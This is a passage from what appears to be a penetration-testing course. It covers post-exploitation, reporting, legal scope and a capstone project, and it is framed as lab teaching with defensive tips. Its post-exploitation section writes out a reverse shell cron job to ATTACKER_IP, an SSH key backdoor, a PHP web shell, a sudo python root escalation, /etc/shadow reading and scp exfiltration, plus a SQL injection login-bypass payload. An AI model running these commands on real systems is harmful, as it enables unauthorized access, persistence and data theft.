• Maintain access
• Extract value

1. Phase 1 — Situational Awareness (Enumeration)

This is ALWAYS your first step after access.

# Basic identity
whoami
id

# System info
uname -a
hostname

# Network
ip addr
netstat -tuln

# Processes
ps aux

# Users
cat /etc/passwd

What You Are Looking For

• Are you root/admin?
• What OS + version?
• What services are running?
• Other users on system?

Example Insight

uid=1000(user) gid=1000(user)

→ You are NOT root → privilege escalation needed

2. Phase 2 — Privilege Escalation (Hands-On)

Quick Automated Check

linpeas.sh

Manual Checks (IMPORTANT)

Sudo Permissions

sudo -l

Example

(ALL) NOPASSWD: /usr/bin/python

→ You can escalate:

sudo python -c 'import os; os.system("/bin/bash")'

SUID Files

find / -perm -4000 2>/dev/null

Look for unusual binaries.

Kernel Exploit Check

uname -r

Search for exploit matching kernel version.

3. Phase 3 — Credential Hunting

# Search for passwords
grep -r "password" /home 2>/dev/null

# Check bash history
cat ~/.bash_history

# Config files
cat /var/www/html/config.php

Example

$db_password = "admin123";

→ Try reuse for SSH or other services

4. Phase 4 — Persistence (Maintain Access)

Method 1: Cron Job (Linux)

crontab -e
*/5 * * * * bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Method 2: SSH Backdoor

mkdir -p ~/.ssh
echo "ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys

Method 3: Web Shell

echo "<?php system($_GET['cmd']); ?>" > shell.php

Access via browser:

http://target/shell.php?cmd=whoami

Windows Persistence

schtasks /create /tn "Updater" /tr "evil.exe" /sc minute /mo 5

5. Phase 5 — Lateral Movement

Move to other machines using stolen credentials.

ssh user@192.168.1.20

Pivoting Example

ssh -D 9050 user@target

→ Use target as proxy to access internal network

6. Phase 6 — Data Collection (NOT DESTRUCTIVE)

ls /home
cat /etc/shadow
tar -czf data.tar.gz /var/www

Exfiltration (Lab Only)

scp data.tar.gz user@attacker_ip:/tmp/

7. Full Attack Chain Example

1. Gain shell (web exploit)
2. Run enumeration (whoami, uname)
3. Find sudo misconfig
4. Escalate to root
5. Dump credentials
6. Add SSH key (persistence)
7. Move to another machine

8. Detection & Defense (VERY IMPORTANT)

• Monitor unusual cron jobs
• Check SSH authorized_keys
• Audit running processes
• Use EDR (Endpoint Detection)
• Apply least privilege principle

9. Common Beginner Mistakes

• Skipping enumeration → missing easy escalation
• Using exploits blindly
• Not documenting steps
• Breaking the system (too aggressive)

Reporting & Legal Aspects (Practical Lab)

🎯 Objective (What You Will Produce)

By the end of this lab, you will create a **real penetration testing report** from your previous exercises (scanning, exploitation, post-exploitation).

1. Step-by-Step Reporting Workflow

1. Collect evidence (screenshots, logs, commands)
2. Verify vulnerability (avoid false positives)
3. Assess impact (what can attacker do?)
4. Assign severity (Critical/High/Medium/Low)
5. Write clear reproduction steps
6. Provide remediation

2. Evidence Collection (VERY PRACTICAL)

What to Capture

• Terminal output
• Screenshots of exploitation
• Tool results (Nmap, Burp, etc.)

# Save scan output
nmap -sV target.com -oN scan.txt

# Save command history
history > commands.txt

3. Writing a Real Vulnerability (Hands-On)

Example: SQL Injection Finding

Vulnerability: SQL Injection
Severity: Critical

Affected URL:
http://target.com/login.php?id=1

Description:
The application does not properly sanitize user input, allowing SQL queries to be manipulated.

Proof of Concept:
Input:
' OR '1'='1' --

Result:
Login bypass successful

Impact:
• Unauthorized access
• Database compromise

Recommendation:
• Use prepared statements
• Validate user input

What Makes This Good

• Clear location
• Exact payload used
• Shows impact
• Fix is actionable

4. Report Template (Use This in Labs)

===============================
PENETRATION TEST REPORT
===============================

Target: [Lab Machine / Domain]
Date: [Insert Date]

1. Executive Summary
- Overall Risk: HIGH
- Key Issues: Weak passwords, outdated services

2. Methodology
- Recon → Scanning → Exploitation → Post-Exploitation

3. Findings

[Finding 1]
Name:
Severity:
Description:
Proof of Concept:
Impact:
Recommendation:

[Finding 2]
...

4. Conclusion
- System is vulnerable due to misconfigurations

5. Remediation Plan
- Fix critical issues immediately

5. Severity Rating (Practical Method)

Instead of memorizing CVSS, ask:

• Can attacker get admin/root? → Critical
• Can attacker access sensitive data? → High
• Limited access? → Medium
• Minor issue? → Low

Example

Open Port 80 → Low
Directory Listing → Medium
SQL Injection → Critical

6. Legal Aspects (Practical Understanding)

Before Testing (Mandatory)

• Written permission
• Defined scope (IPs, domains)
• Time window

Example Scope

Allowed:
192.168.1.0/24

Not Allowed:
Production servers
Third-party services

During Testing

• No data destruction
• No service disruption
• Stay within scope

After Testing

• Delete collected sensitive data
• Submit report securely

7. Common Reporting Mistakes

• Too technical for management
• No proof of concept
• No remediation steps
• Copy-paste from tools without explanation

8. Lab Exercise — Build Your First Report

Capstone Project: Full Penetration Test

Project Overview

Congratulations! You have reached the final lecture. Now you will perform a **complete, realistic penetration test** on a vulnerable target, following professional methodology.

Target Environment

Use one of these legal lab environments:

• Metasploitable 2 / 3
• TryHackMe / HackTheBox machines (recommended)
• DVWA + VulnHub VMs
• Your own isolated virtual lab

Capstone Requirements

Phase 1: Reconnaissance & Footprinting

• Passive information gathering (WHOIS, Google Dorks, Shodan)
• Active host & service discovery

Phase 2: Scanning & Enumeration

• Full port scanning with Nmap
• Service version detection
• Web directory brute-forcing
• SMB / SNMP enumeration (if applicable)

Phase 3: Vulnerability Analysis & Exploitation

• Identify at least 3 exploitable vulnerabilities
• Gain initial shell access (Meterpreter or reverse shell)
• Perform privilege escalation

Phase 4: Post-Exploitation & Persistence

• Establish persistence
• Extract sensitive data / credentials
• Demonstrate lateral movement (if multiple machines)

Phase 5: Reporting

• Write a full professional penetration testing report
• Include Executive Summary, Methodology, Findings with PoC, Risk Ratings, and Remediation Recommendations

Bonus Challenges (Optional)

• Crack captured password hashes
• Perform a client-side attack (phishing simulation)
• Exploit a web application vulnerability manually
• Create a custom payload / bypass antivirus

Social Engineering

Content coming soon...

Cryptography Basics

Content coming soon...

Cloud Security (AWS/Azure)

Content coming soon...

Final Project — Full Penetration Test

Content coming soon...